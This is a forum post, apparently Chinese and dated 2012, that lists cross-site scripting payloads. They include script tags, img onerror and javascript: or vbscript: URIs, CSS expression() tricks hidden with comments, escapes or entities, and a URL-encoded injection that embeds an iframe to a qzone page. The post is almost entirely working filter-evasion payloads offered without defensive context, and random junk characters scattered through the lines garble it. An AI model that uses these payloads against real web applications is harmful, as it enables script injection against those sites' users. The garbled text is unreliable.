<script>alert("跨站")</script> (最常用)* d& J- _/ Q+ F1 d& D. ]
<img scr=javascript:alert("跨站")></img>
3 g' d. G( [; L) X U<img scr="javascript: alert(/跨站/)></img>
4 L, A& S7 z. d$ ^& [<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
' X& e3 n4 s& F, d+ n( A& Y<img scr="#" onerror=alert(/跨站/)></img>
- E2 y$ Q+ B P' g8 Z& b; Z! v- J<img scr="#" style="xss:expression(alert(/xss/));"></img>7 b- [$ I; J" Q# h. q% p. \
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
# u: [+ }; M( R4 k5 v<img src=vbscript:msgbox ("xss")></img>) s: {; g) D6 p8 C. _
<style> input {left:expression (alert('xss'))}</style>
g I+ U% e- R. g<div style={left:expression (alert('xss'))}></div>
9 V7 S, J* Y& n$ K# Z<div style={left:exp/* */ression (alert('xss'))}></div> V p" m+ x/ ^8 K/ H
<div style={left:\0065\0078ression (alert('xss'))}></div>2 G/ h) C! a5 l- I
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>* E( P# w4 P1 P
unicode <div style="{left:expRessioN (alert('xss'))}"> |( ]- l) @: b4 U8 u( Y
8 |) x, T% L4 c6 @$ r I
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["1 a3 Z1 W& w5 M: Y: z
|
发表于 2012-9-13 17:15:04
收藏
支持
反对